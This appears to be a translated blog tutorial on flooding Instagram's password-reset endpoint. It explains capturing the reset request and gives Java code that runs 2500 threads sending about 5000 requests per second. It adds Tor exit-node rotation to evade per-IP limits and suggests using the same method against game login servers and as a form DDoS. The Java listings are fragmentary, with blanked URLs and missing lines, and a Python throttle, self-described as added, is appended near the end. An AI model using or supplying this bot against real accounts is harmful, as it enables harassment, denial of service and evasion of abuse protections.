Instagram Password Reset Attack and Bot Making

“Instagram hacking!” Most people who hear this phrase think of questions such as “How to hack an account?” or “How to view a locked profile without being followed?” Since this is an issue that Instagram employees pay particular attention to, it is difficult to succeed at such hacking attempts. But the hack that we will describe in this article is a little different from the others.

We will try to convey the subject based on an event that happened in recent days. While examining the account of a friend whose Instagram profile was recently hacked, one point caught our attention: when an account is hacked, the first thing to do is to go to the "forgot password" section. In this section, whether or not the account is your own, the information required for login, such as the Instagram user name, e-mail or phone number, can be entered and Instagram can send a password reset message.

Afterwards, during the work on the account, a password renewal request was sent for the hacked account. We concluded that the person who took over the account had linked his own phone number to it, which meant that the password reset request was sent to the hacker's phone. Based on this result, sending the password reset request to the hacker's phone 1000 times per second could be a solution to the problem. The next steps are to create a bot that generates HTTP packets and sends them from multiple threads, and, when the password renewal request is made, to produce the same packet and send it via the bot. The study, summarized so far, shows the “lack of captcha protection of the password renewal section”, which results from Instagram's failure to take into account that this type of spam attack can be made. The final version of the bot has been tested and run successfully. We will share the details of the study in the rest of the article.

Stage 1: Capturing Packets

In the first stage of the study, the original packet that the computer sends when a password renewal is requested for an account on Instagram must be found. Many programs can be used for this, but many of them add complexity to the process. Instead, we recommend using a simple web browser plug-in, HTTP-Repeater.

Download link:

After the add-on is downloaded and installed, it is run by clicking the add-on icon in the browser. Since the target site is Instagram, packets related to Instagram should be filtered to avoid confusion. For this, the filter section in the tab opened by the plug-in is used.

After filtering, you are ready to send a password renewal request to Instagram. Instagram's password renewal section is opened in the browser, an account username is entered and the button is pressed. Back in the plug-in's tab, the packet sent with the POST method must be located.

After the search, the password renewal packet and all relevant details are listed. The next step is to create a bot that constantly produces and sends the same packet.

Stage 2: Creating the Packet Generator Bot

In the second stage of the study, a bot is created that can produce exactly the same packet obtained as a result of filtering (the "email_or_username=" value in the packet is different for each user, so there will be a variable after the "=" sign). Java was used in this study. The bot needs to send these packets in a multithreaded way, which makes the attack more effective. In addition, the Java language is more advantageous for multithreading than the other languages that could be preferred.

The first step in the code that creates the bot is to prepare the class structure that will do the multithreading.

public static class InstagramResetThread extends Thread {

private String user;

private long delay;


public InstagramResetThread(String user, long delay) throws Exception {

this.user = user;

this.delay = delay;




public void run() {





url = url new URL(“”);

URLConnection con = url.openConnection();

HttpURLConnection http = (HttpURLConnection)con;



map arguments = new HashMap<>();

arguments.put(“email_or_username”, user);

arguments.put(“recaptcha_challenge_field”, “”);

StringJoiner sj = new StringJoiner(“&”);

for(Map.Entry entry : arguments.entrySet())

sj.add(URLEncoder.encode(entry.getKey(), “UTF-8”) + “="

+ URLEncoder.encode(entry.getValue(), “UTF-8”));

byte[] out = sj.toString().getBytes(StandardCharsets.UTF_8);

int length = out.length;


http.setRequestProperty(“Content-Type”, “application/x-www-form-urlencoded; charset=UTF-8”);

http.setRequestProperty(“X-Requested-With”, “XMLHttpRequest”);

http.setRequestProperty(“X-CSRFToken”, “pOVGNGyRjyQIuWpxlmAoRJeVMePXOXbO”);

http.setRequestProperty(“X-IG-App-ID”, “936619743392459”);

http.setRequestProperty(“Origin”, “”);

http.setRequestProperty(“X-Instagram-AJAX”, “550ed74fd7c9”);



try(OutputStream os = http.getOutputStream()) {


}catch (Exception e) {e.printStackTrace();}



} catch (Exception e) {e.printStackTrace();}


try{Thread.sleep(delay);}catch(Exception e2){e2.printStackTrace();}





}//end of InstagramReset thread

The headers used and the data to be POSTed are the same as those obtained by filtering with the “HTTP-Repeater” plug-in. (User-Agent identifies your browser. You do not need to set it in the code, since its value changes whenever the site is opened with a different browser.)

After the class structure is created, a loop must be written that uses the class as threads.

String user = “instagram”;

int threads = 2500;

int delay = 500;


try {


for (int i = 0; i < threads; i++) {

InstagramResetThread thread = new InstagramResetThread(user, delay);




} catch (Exception e1) {e1.printStackTrace();}

When this code block is run in the main function, 2500 instances of the thread class written above are created, and each sends requests at intervals of 500 milliseconds (5000 times per second in total). As a result, Instagram will send password reset requests for the account.

Bonus: Tor Integration

Captcha or DDoS protection on some target sites may limit such password renewal requests per IP. In such cases, Tor must be used to circumvent the limitation. Each time the limit is exceeded, a different exit node must be used. Since the IP then always looks different, this obstacle is overcome and a password reset request is sent as many times as desired. This section explains how to add this feature to the program.

System.setProperty(“http.proxySet”, “true”);

System.setProperty(“http.proxyHost”, “”);


System.setProperty(“https.proxySet”, “true”);

System.setProperty(“https.proxyHost”, “”);


System.setProperty(“socksProxyHost”, “”);

System.setProperty(“socksProxyPort”, “9150”);

With this block placed at the top of the main function, the connections made by the Java program are routed through Tor. However, before the program is run, Tor Browser Bundle or AdvOR must be started and the Tor connection must be established.

Download links:

NOTE: You can check that the Tor connection has been set up with a code block added to the Java program.

//IP check

JPanel TorGui = new JPanel();

TorGui.setLayout(new GridLayout(1,1));

JEditorPane website = new JEditorPane(“”);

//JEditorPane website = new JEditorPane(“”);






TorGui.add(new JScrollPane(website));



//tor check

JPanel TorGui2 = new JPanel();

TorGui2.setLayout(new GridLayout(1,1));

JEditorPane website2 = new JEditorPane(“”);






TorGui2.add(new JScrollPane(website2));



JTabbedPane tabs = new JTabbedPane();

tabs.add(“”, TorGui2);

tabs.add(“”, TorGui);


JFrame torbrowser = new JFrame(“Internal Tor Browser”);

torbrowser.setLayout(new GridLayout(1,1));

torbrowser.setSize(640, 480);




This block creates a simple two-tab browser window, shown in the images below, that allows the Tor connection to be seen.

What Approach Does Instagram Take in This Regard?

All these processes reveal the need to learn the Bug Bounty policy of the relevant sites. When Instagram's policy is examined (the rules may be the same for companies like Facebook), almost nothing is covered, or it is ignored, except for hackers trying to take over a user's account.

In What Other Situations Can This Attack Be Used?

Considering that the attack is a multithreaded HTTP form-filling process, the target must have an IP blocking system of the kind made for DDoS in order to prevent it. (In network traffic the attack looks the same as a DDoS attack, and if the target site is weak in terms of security, a DDoS effect can be created. This is a spam attack, though; it can also be considered a DDoS attack on a form.) Simple captcha protection can remedy this situation, which draws attention to the importance of captcha.

In addition, the attack can be tried on an online game that uses a client program with a login system instead of a web site. The point to note here is that if the client program encrypts the packets before sending them to the server, the attack will be difficult. A more comprehensive traffic inspection tool than a browser plug-in will also be needed.
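The Tor section shows why an IP block on its own does not stop this flood: the one constant across all the requests is the target account. The sketch below is a server-side sliding-window throttle keyed on the normalized email_or_username as well as the client IP. It is an added example, not Instagram's code or part of the original article; the class name, the limits and the sample addresses are assumptions.

```python
import time
from collections import defaultdict, deque


class ResetThrottle:
    """Sliding-window limiter for a password-reset endpoint (hypothetical)."""

    def __init__(self, per_account=3, per_ip=10, window=3600.0, clock=time.monotonic):
        self.limits = {"acct": per_account, "ip": per_ip}
        self.window = window
        self.clock = clock
        self.hits = defaultdict(deque)  # (kind, key) -> times a reset was sent

    @staticmethod
    def normalize(identifier):
        # "Victim ", "victim" and "@victim" must land in the same bucket.
        return identifier.strip().lstrip("@").casefold()

    def _over(self, kind, key, now):
        q = self.hits[(kind, key)]
        while q and now - q[0] >= self.window:
            q.popleft()  # forget sends that have left the window
        return len(q) >= self.limits[kind]

    def allow(self, email_or_username, client_ip):
        """True if a reset message may be sent, False if it must be suppressed."""
        # The HTTP response should look the same either way, so the sender
        # cannot tell when the throttle engaged.
        now = self.clock()
        acct = self.normalize(email_or_username)
        over_acct = self._over("acct", acct, now)
        over_ip = self._over("ip", client_ip, now)
        if over_acct or over_ip:
            return False
        self.hits[("acct", acct)].append(now)
        self.hits[("ip", client_ip)].append(now)
        return True


def simulate_rotating_sources(n_requests=100):
    """Constructed input: one target account, a different source IP per request."""
    throttle = ResetThrottle(per_account=3, per_ip=10, window=3600.0)
    sent = 0
    for i in range(n_requests):
        ip = f"198.51.100.{i % 250 + 1}"  # documentation range, constructed
        if throttle.allow("victim_account", ip):
            sent += 1
    return sent
```

With the per-account key in place, the 100 constructed requests from 100 different addresses produce only three reset messages; a limiter keyed on IP alone would have let all of them through.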


Everything described in the article is purely for educational purposes. You must not engage in illegal activities against the accounts. We are not responsible for the problems encountered.

